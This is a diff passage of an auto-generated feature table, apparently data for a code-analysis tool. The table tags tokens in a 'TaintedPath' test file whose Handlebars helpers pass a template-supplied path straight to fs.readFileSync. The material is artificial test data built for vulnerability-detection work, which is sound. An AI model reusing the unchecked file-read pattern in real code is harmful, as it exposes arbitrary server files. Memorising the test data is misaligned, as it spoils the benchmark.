autogenerated/TaintedPath/handlebars.js:17:16:17:38 | return of anonymous function | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | contextSurroundingFunctionParameters | ()\n(prefix, filePath)\n(line) | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:17:17:20 | line | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | contextSurroundingFunctionParameters | ()\n(prefix, filePath)\n(line) | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:26:17:31 | prefix | stringConcatenatedWith | -endpoint- line | +| autogenerated/TaintedPath/handlebars.js:17:26:17:38 | prefix + line | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:26:17:38 | prefix + line | contextSurroundingFunctionParameters | ()\n(prefix, filePath)\n(line) | +| autogenerated/TaintedPath/handlebars.js:17:26:17:38 | prefix + line | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:26:17:38 | prefix + line | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:26:17:38 | prefix + line | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | contextSurroundingFunctionParameters | ()\n(prefix, filePath)\n(line) | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:17:35:17:38 | line | stringConcatenatedWith | prefix -endpoint- | +| autogenerated/TaintedPath/handlebars.js:18:12:18:15 | join | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:18:12:18:15 | join | contextSurroundingFunctionParameters | ()\n(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:18:12:18:15 | join | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:18:12:18:15 | join | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:18:12:18:15 | join | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | CalleeFlexibleAccessPath | fs.readFileSync().split().map().join | | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | calleeImports | fs | @@ -7088,6 +67685,52 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:18:17:18:20 | "\\n" | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:5:20:8 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:5:20:8 | data | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:5:20:8 | data | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:5:20:8 | data | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:5:20:8 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:5:20:27 | data.co ... eAccess | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:5:20:27 | data.co ... eAccess | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:5:20:27 | data.co ... eAccess | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:5:20:27 | data.co ... eAccess | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:5:20:27 | data.co ... eAccess | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:5:20:91 | data.co ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:5:20:91 | data.co ... ath}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:5:20:91 | data.co ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:5:20:91 | data.co ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:5:20:91 | data.co ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:10:20:27 | compiledFileAccess | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:10:20:27 | compiledFileAccess | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:10:20:27 | compiledFileAccess | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:10:20:27 | compiledFileAccess | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:10:20:27 | compiledFileAccess | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:31:20:32 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:31:20:32 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:31:20:32 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:31:20:32 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:31:20:32 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:31:20:40 | hb.compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:31:20:40 | hb.compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:31:20:40 | hb.compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:31:20:40 | hb.compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:31:20:40 | hb.compile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | exceptional return of hb.comp ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | exceptional return of hb.comp ... ath}}") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | exceptional return of hb.comp ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | exceptional return of hb.comp ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | exceptional return of hb.comp ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | assignedToPropName | compiledFileAccess | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:31:20:91 | hb.comp ... ath}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:20:34:20:40 | compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:20:34:20:40 | compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:20:34:20:40 | compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:20:34:20:40 | compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:20:34:20:40 | compile | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | CalleeFlexibleAccessPath | hb.compile | | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | calleeImports | handlebars | @@ -7097,6 +67740,52 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:20:42:20:90 | "conten ... path}}" | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:21:5:21:8 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:5:21:8 | data | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:5:21:8 | data | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:5:21:8 | data | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:5:21:8 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:5:21:23 | data.compiledBenign | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:5:21:23 | data.compiledBenign | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:5:21:23 | data.compiledBenign | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:5:21:23 | data.compiledBenign | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:5:21:23 | data.compiledBenign | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:5:21:55 | data.co ... ame}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:5:21:55 | data.co ... ame}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:5:21:55 | data.co ... ame}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:5:21:55 | data.co ... ame}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:5:21:55 | data.co ... ame}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:10:21:23 | compiledBenign | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:10:21:23 | compiledBenign | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:10:21:23 | compiledBenign | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:10:21:23 | compiledBenign | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:10:21:23 | compiledBenign | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:27:21:28 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:27:21:28 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:27:21:28 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:27:21:28 | hb | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:27:21:28 | hb | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:27:21:36 | hb.compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:27:21:36 | hb.compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:27:21:36 | hb.compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:27:21:36 | hb.compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:27:21:36 | hb.compile | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | exceptional return of hb.comp ... ame}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | exceptional return of hb.comp ... ame}}") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | exceptional return of hb.comp ... ame}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | exceptional return of hb.comp ... ame}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | exceptional return of hb.comp ... ame}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | assignedToPropName | compiledBenign | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:27:21:55 | hb.comp ... ame}}") | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:21:30:21:36 | compile | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:21:30:21:36 | compile | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:21:30:21:36 | compile | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:21:30:21:36 | compile | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:21:30:21:36 | compile | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | CalleeFlexibleAccessPath | hb.compile | | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | calleeImports | handlebars | @@ -7106,6 +67795,67 @@ tokenFeatures | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | enclosingFunctionName | init | | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | fileImports | express fs handlebars | | autogenerated/TaintedPath/handlebars.js:21:38:21:54 | "hello, {{name}}" | receiverName | hb | +| autogenerated/TaintedPath/handlebars.js:22:5:22:8 | data | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:5:22:8 | data | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:5:22:8 | data | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:5:22:8 | data | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:5:22:8 | data | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:5:22:24 | data.compiledUnknown | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:5:22:24 | data.compiledUnknown | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:5:22:24 | data.compiledUnknown | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:5:22:24 | data.compiledUnknown | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:5:22:24 | data.compiledUnknown | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:5:22:75 | data.co ... late")) | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:5:22:75 | data.co ... late")) | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:5:22:75 | data.co ... late")) | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:5:22:75 | data.co ... late")) | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:5:22:75 | data.co ... late")) | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:10:22:24 | compiledUnknown | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:10:22:24 | compiledUnknown | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:10:22:24 | compiledUnknown | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| autogenerated/TaintedPath/handlebars.js:22:10:22:24 | compiledUnknown | enclosingFunctionName | init | +| autogenerated/TaintedPath/handlebars.js:22:10:22:24 | compiledUnknown | fileImports | express fs handlebars | +| autogenerated/TaintedPath/handlebars.js:22:28:22:29 | hb | contextFunctionInterfaces | catFile(filePath)\ninit()\nprependToLines(prefix, filePath) | +| autogenerated/TaintedPath/handlebars.js:22:28:22:29 | hb | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/handlebars.js:22:28:22:29 | hb | enclosingFunctionBody | hb registerHelper catFile catFile filePath fs readFileSync filePath hb registerHelper prependToLines prependToLines prefix filePath fs readFileSync filePath split \n map line prefix line join \n data compiledFileAccess hb compile contents of file {{path}} are: {{catFile path}} data compiledBenign hb compile hello, {{name}} data compiledUnknown hb compile fs readFileSync greeting.template data compiledMixed hb compile helpers may have several args, like here: {{prependToLines prefix path}} | +| 